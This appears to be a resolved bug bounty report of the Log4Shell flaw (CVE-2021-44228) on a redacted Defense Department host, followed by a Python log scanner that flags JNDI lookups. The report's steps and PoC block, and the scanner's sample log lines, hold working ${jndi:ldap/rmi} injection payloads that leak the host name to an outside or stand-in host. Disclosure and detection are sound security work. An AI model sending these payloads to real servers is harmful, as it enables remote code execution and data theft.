Log4j Vulnerability [HtUS]
Critical
U.S. Dept Of Defense
Reported by
ferreiraklet_
Vulnerability Details
Technical details and impact analysis
**Description:**
Hi team,
Log4Shell is a recent 0-day exploit; it's a Java package vulnerability. █████ is vulnerable.
**Impact**
RCE
**System Host(s)**
██████
**Affected Product(s) and Version(s)**
**CVE Numbers**
CVE-2021-44228
**Steps to Reproduce**
1. Go to this URL => https://█████/?x=${jndi:ldap://${hostName}.uri.xxxxx.burpcollaborator.net/a}
2. Paste the PoC code in the parameter.
3. Then Burp Collaborator receives a reverse ping back.
Photos below
**POC CODE**
${jndi:ldap://${hostName}.uri.xxxxx.burpcollaborator.net/a}
**Suggested Mitigation/Remediation Actions**
https://www.lunasec.io/docs/blog/log4j-zero-day/
## Impact
A successful attack leads to arbitrary code execution on the application.
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2021-44228
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from …
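The report's PoC and the CVE description above both hinge on one thing: a `${jndi:...}` lookup landing in a logged value, optionally wrapped around nested lookups such as `${hostName}` that leak host context to the attacker's LDAP server. The following detector is an added example written for this page (not the reporter's code and not part of HackerOne or Log4j) that a responder could run over web-server access logs to triage which requests carried a JNDI lookup, which protocol they used, and whether they embedded nested lookups. The log lines are constructed samples; the hostnames in them are placeholders.

```python
import re

# Constructed sample access-log lines (not from the report). The first mirrors
# the shape of the report's PoC with placeholder hosts; the third shows the
# same lookup arriving via the User-Agent header instead of a query parameter.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:13:01:22 +0000] "GET /?x=${jndi:ldap://${hostName}.uri.xxxxx.burpcollaborator.net/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:13:01:30 +0000] "GET /search?q=log4j HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:13:02:01 +0000] "GET / HTTP/1.1" 200 1024 "-" "${JNDI:rmi://attacker.example/x}"',
]

# Start of a JNDI lookup; Log4j lookup keys are case-insensitive, so match that way.
JNDI_START = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def find_jndi_lookups(text):
    """Return every ${jndi:...} lookup in text.

    Each finding carries the raw lookup, the JNDI scheme (ldap, rmi, dns, ...),
    the target after the scheme, and any nested ${...} lookups found inside
    (e.g. hostName, which the report's PoC uses to leak the victim host name).
    Braces are counted so a nested lookup does not cut the match short.
    """
    findings = []
    for m in JNDI_START.finditer(text):
        start = m.start()
        depth = 0
        end = None
        for i in range(start, len(text)):
            if text.startswith("${", i):
                depth += 1
            elif text[i] == "}":
                depth -= 1
                if depth == 0:
                    end = i
                    break
        body = text[m.end():end] if end is not None else text[m.end():]
        scheme, _, target = body.partition(":")
        findings.append({
            "raw": text[start:end + 1] if end is not None else text[start:],
            "scheme": scheme.strip().lower(),
            "target": target.strip(),
            "nested_lookups": re.findall(r"\$\{([^{}]*)\}", body),
            # An unterminated lookup still deserves a look: the line may be cut off.
            "truncated": end is None,
        })
    return findings


def scan_log_lines(lines):
    """Return (1-based line number, finding) pairs for every lookup in the lines."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for finding in find_jndi_lookups(line):
            hits.append((number, finding))
    return hits


if __name__ == "__main__":
    for number, hit in scan_log_lines(SAMPLE_LOG_LINES):
        nested = ", ".join(hit["nested_lookups"]) or "none"
        print(f"line {number}: scheme={hit['scheme']} target={hit['target']} nested={nested}")
```

Because the matcher counts braces rather than stopping at the first `}`, the report's payload is reported as one `ldap` lookup with a nested `hostName` lookup, which is the signal that the request was probing for context exfiltration and not just a blind callback. Run it over the full request (path, query, and every header that the application logs), since the third sample line shows the same lookup arriving in a User-Agent string.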
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$1000.00
Weakness
Command Injection - Generic